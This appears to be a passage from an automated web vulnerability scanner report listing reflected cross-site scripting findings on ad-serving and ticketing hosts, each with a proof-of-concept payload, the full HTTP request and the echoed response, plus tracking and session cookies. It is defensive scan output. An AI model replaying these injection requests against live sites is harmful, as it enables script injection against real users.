Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
t_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium9f8ad'-alert(1)-'530dfc3a08e';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C5
...[SNIP]...

4.75. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venueid_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venueid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bb01'-alert(1)-'67bf9ccb3cd was submitted in the _RM_HTML_venueid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=12337bb01'-alert(1)-'67bf9ccb3cd&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...

var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='12337bb01'-alert(1)-'67bf9ccb3cd';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new Image (1,1);
var b3_g
...[SNIP]...

4.76. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_venuezip_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_venuezip_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a2ce'-alert(1)-'37855b65c24 was submitted in the _RM_HTML_venuezip_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=070733a2ce'-alert(1)-'37855b65c24&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
ur';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='070733a2ce'-alert(1)-'37855b65c24';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D43';
var venueid='1
...[SNIP]...

4.77. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffcbb"><script>alert(1)</script>3da72bcef52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSampleffcbb"><script>alert(1)</script>3da72bcef52/wwww.themig.com/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSampleffcbb"><script>alert(1)</script>3da72bcef52/wwww.themig.com/149311977/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.78. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f185"><script>alert(1)</script>c015f41fa84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com9f185"><script>alert(1)</script>c015f41fa84/1627503762@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:25 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com9f185"><script>alert(1)</script>c015f41fa84/1805526034/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.79. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1627503762@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1627503762@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0e6"><script>alert(1)</script>9ef75515961 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1627503762@x968a0e6"><script>alert(1)</script>9ef75515961?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Contact%20Us&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/contact.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 337
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/1361702731/x968a0e6"><script>alert(1)</script>9ef75515961/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.80. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dd27"><script>alert(1)</script>7e0afdb5b4d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample9dd27"><script>alert(1)</script>7e0afdb5b4d/wwww.themig.com/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 344
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample9dd27"><script>alert(1)</script>7e0afdb5b4d/wwww.themig.com/831506250/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.81. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fdec"><script>alert(1)</script>c64d1920d72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com5fdec"><script>alert(1)</script>c64d1920d72/1936689153@x96?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com5fdec"><script>alert(1)</script>c64d1920d72/1161003160/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.82. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49b67"><script>alert(1)</script>5a1d01317d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1936689153@x9649b67"><script>alert(1)</script>5a1d01317d2?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/765672396/x9649b67"><script>alert(1)</script>5a1d01317d2/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.83. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cbb"><script>alert(1)</script>fa065146d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSamplec5cbb"><script>alert(1)</script>fa065146d48/wwww.themig.com/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSamplec5cbb"><script>alert(1)</script>fa065146d48/wwww.themig.com/1106225608/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.84. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f339e"><script>alert(1)</script>b7dc5d37df2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.comf339e"><script>alert(1)</script>b7dc5d37df2/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.comf339e"><script>alert(1)</script>b7dc5d37df2/1189746631/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.85. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a29e6"><script>alert(1)</script>f274f4d0047 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1@x96a29e6"><script>alert(1)</script>f274f4d0047?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/316215392/x96a29e6"><script>alert(1)</script>f274f4d0047/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.86. http://bing.fansnap.com/checkout/index/415814268 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fdd36(a)b5a28ad72b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268fdd36(a)b5a28ad72b3?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
